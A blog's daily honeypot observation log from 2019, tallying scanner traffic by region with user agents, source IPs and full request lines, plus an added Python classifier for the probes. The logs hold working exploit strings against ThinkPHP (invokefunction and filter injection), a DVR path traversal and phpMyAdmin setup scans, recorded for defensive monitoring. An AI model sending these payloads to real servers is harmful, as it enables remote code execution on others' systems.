コンニチハレバレトシタアオゾラ

With nothing better to do, I spend the whole day facing my blog, jotting down at random whatever trifling thoughts drift through my mind.

2019/10/26 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2019/10/26.

Highlights
Region:AP

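We observed the following:

Access attempts targeting the ThinkPHP vulnerability (we also observed patterns different from those seen so far)
Access attempts targeting the vulnerability in Shenzhen TVT products
Scanning for phpMyAdmin
Access to Dockerfile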

Region:US

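We observed the following:

Access attempts targeting the vulnerability in HiSilicon DVR Devices
Access attempts targeting the ThinkPHP vulnerability (we also observed patterns different from those seen so far)
Access attempts targeting the vulnerability in Shenzhen TVT products
Scanning for phpMyAdmin
Scanning by ZmEu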

Region:EU

We observed the following:

Access to Dockerfile
Scanning for phpMyAdmin
Scanning by ZmEu

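Access count trend

AP: total accesses: 71 (change from previous day: +58)
US: total accesses: 91 (change from previous day: -141)
EU: total accesses: 13 (change from previous day: +8)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.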

Region:AP

Source IP addresses


User-Agent list

Count UserAgent
3 -
10 ApiTool
1 curl/7.47.0
1 Go-http-client/1.1
45 Java/1.8.0_131
1 Mozilla/5.0
1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
3 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

Request list

Count Method Request Protocol
1 -
1 GET /Dockerfile HTTP/1.1
1 GET /Dockerfile HTTP/1.1\n
1 GET /editBlackAndWhiteList HTTP/1.1
3 GET /index.php HTTP/1.1
6 GET /index.php?s=captcha HTTP/1.1
1 GET /index.php?s=index/index/index HTTP/1.1
1 GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() HTTP/1.1
1 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=/index/\\think\\request/cache&key=1 phpinfo|HTTP/1.1
1 GET /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
1 GET /index.php?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
3 GET /public/index.php HTTP/1.1
3 GET /public/index.php?s=captcha HTTP/1.1
1 GET /public/index.php?s=captcha&test=1 HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=captcha HTTP/1.1
1 GET /public/?s=captcha&test=1 HTTP/1.1
1 GET /public/?s=index/index/index HTTP/1.1
1 GET /public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} HTTP/1.1
1 GET /public/?s=index/\think\module/action/param1/${%40phpinfo()} HTTP/1.1
1 GET /public/?s=index/\think\Module/Action/Param/${%40phpinfo()} HTTP/1.1
1 GET /public/?s=/index/\\think\\request/cache&key=1 phpinfo|HTTP/1.1
1 GET /public/?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
1 GET /public/?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> HTTP/1.1
1 GET /robots.txt HTTP/1.1
3 GET /?s=captcha HTTP/1.1
1 GET /?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} HTTP/1.1
1 GET /?s=index/\think\module/action/param1/${%40phpinfo()} HTTP/1.1
1 GET /?s=index/\think\Module/Action/Param/${%40phpinfo()} HTTP/1.1
1 GET /thinkphp/library/think/Request.php?c=exec&f=phpinfo&&_method=filter& HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /webdav/ HTTP/1.1
10 POST /editBlackAndWhiteList HTTP/1.1
1 POST /TP/index.php?s=captcha HTTP/1.1
1 \x03

Region:US

Source IP addresses


User-Agent list

Count UserAgent
6 -
1 ApiTool
2 Go-http-client/1.1
45 Java/1.8.0_131
18 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
18 ZmEu

Request list

Count Method Request Protocol
3
2 GET /elrekt.php HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
1 GET HTTP/1.1
5 GET /index.php HTTP/1.1
6 GET /index.php?s=captcha HTTP/1.1
1 GET /index.php?s=index/index/index HTTP/1.1
1 GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() HTTP/1.1
1 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
3 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=/index/\\think\\request/cache&key=1 phpinfo|HTTP/1.1
1 GET /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
1 GET /index.php?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> HTTP/1.1
1 GET login.cgi HTTP/1.0
1 GET ../../mnt/custom/ProductDefinition HTTP
2 GET /myadmin/scripts/setup/php HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
3 GET /MyAdmin/scripts/setup.php HTTP/1.1
3 GET /phpmyadmin/scripts/setup.php HTTP/1.1
3 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
3 GET /pma/scripts/setup.php HTTP/1.1
5 GET /public/index.php HTTP/1.1
3 GET /public/index.php?s=captcha HTTP/1.1
1 GET /public/index.php?s=captcha&test=1 HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=captcha HTTP/1.1
1 GET /public/?s=captcha&test=1 HTTP/1.1
1 GET /public/?s=index/index/index HTTP/1.1
1 GET /public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /public/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} HTTP/1.1
1 GET /public/?s=index/\think\module/action/param1/${%40phpinfo()} HTTP/1.1
1 GET /public/?s=index/\think\Module/Action/Param/${%40phpinfo()} HTTP/1.1
1 GET /public/?s=/index/\\think\\request/cache&key=1 phpinfo|HTTP/1.1
1 GET /public/?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
1 GET /public/?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> HTTP/1.1
3 GET /?s=captcha HTTP/1.1
1 GET /?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} HTTP/1.1
1 GET /?s=index/\think\module/action/param1/${%40phpinfo()} HTTP/1.1
1 GET /?s=index/\think\Module/Action/Param/${%40phpinfo()} HTTP/1.1
2 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /thinkphp/library/think/Request.php?c=exec&f=phpinfo&&_method=filter& HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
3 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 POST /editBlackAndWhiteList HTTP/1.1
2 POST /index.php?s=captcha HTTP/1.1

Region:EU

Source IP addresses

Count Source IP address
7 153.126.205.162 Japan
1 185.31.163.237 Russia
1 23.239.12.17 United States
4 71.6.199.23 United States

User-Agent list

Count UserAgent
5 -
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1 python-requests/2.19.1
6 ZmEu

Request list

Count Method Request Protocol
1 GET /Dockerfile HTTP/1.1\n
1 GET /favicon.ico HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /MyAdmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
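
An added example, not part of the original post: one way to tag rows from the request lists above with the categories named in the highlights and total their counts. The signature patterns and the path-to-product mapping (`/editBlackAndWhiteList` as Shenzhen TVT, `mnt/custom/ProductDefinition` as HiSilicon DVR) are assumptions inferred from which regions list them; the sample rows are copied from the tables on this page.

```python
import re
from collections import Counter
from urllib.parse import unquote

METHODS = {"GET", "POST", "HEAD", "PUT", "OPTIONS"}

# Assumed signatures, inferred from the request tables on this page; first match wins.
SIGNATURES = [
    ("thinkphp", re.compile(r"[?&]s=/?(index/|captcha)|/thinkphp/", re.I)),
    ("shenzhen_tvt", re.compile(r"^/editBlackAndWhiteList", re.I)),
    ("hisilicon_dvr", re.compile(r"mnt/custom/ProductDefinition", re.I)),
    ("phpmyadmin", re.compile(r"/(phpmyadmin|myadmin|pma)/|^/mysql/", re.I)),
    ("zmeu", re.compile(r"^/w00tw00t\.", re.I)),
    ("dockerfile", re.compile(r"^/Dockerfile$", re.I)),
]

def parse_row(row):
    """Split 'count METHOD target PROTOCOL', tolerating missing fields."""
    parts = row.split()
    count, rest = int(parts[0]), parts[1:]
    method = rest.pop(0) if rest and rest[0] in METHODS else None
    if rest and rest[-1].startswith("HTTP"):
        rest.pop()  # protocol token, e.g. HTTP/1.1 or a bare HTTP
    return count, method, " ".join(rest)

def classify(target):
    """Return the first matching category for a request target, else 'other'."""
    decoded = unquote(target)  # normalise %xx escapes before matching
    for name, pattern in SIGNATURES:
        if pattern.search(decoded):
            return name
    return "other"

def tally(rows):
    """Sum the per-row counts by category."""
    totals = Counter()
    for row in rows:
        count, _method, target = parse_row(row)
        totals[classify(target)] += count
    return totals

SAMPLE_ROWS = [  # rows copied from the request lists on this page
    r"3 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1",
    r"1 GET /index.php?s=/index/\\think\\request/cache&key=1 phpinfo|HTTP/1.1",
    "2 POST /index.php?s=captcha HTTP/1.1", "1 POST /editBlackAndWhiteList HTTP/1.1",
    "1 GET ../../mnt/custom/ProductDefinition HTTP", "3 GET /phpMyAdmin/scripts/setup.php HTTP/1.1",
    "2 GET /myadmin/scripts/setup/php HTTP/1.1", r"1 GET /Dockerfile HTTP/1.1\n",
    "3 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1",
    "1 GET HTTP/1.1", "3", "1 GET /wp-login.php HTTP/1.1",
]
```

Rows that match no signature, including the malformed ones with an empty request, fall into `other`, so new probe patterns show up there for review.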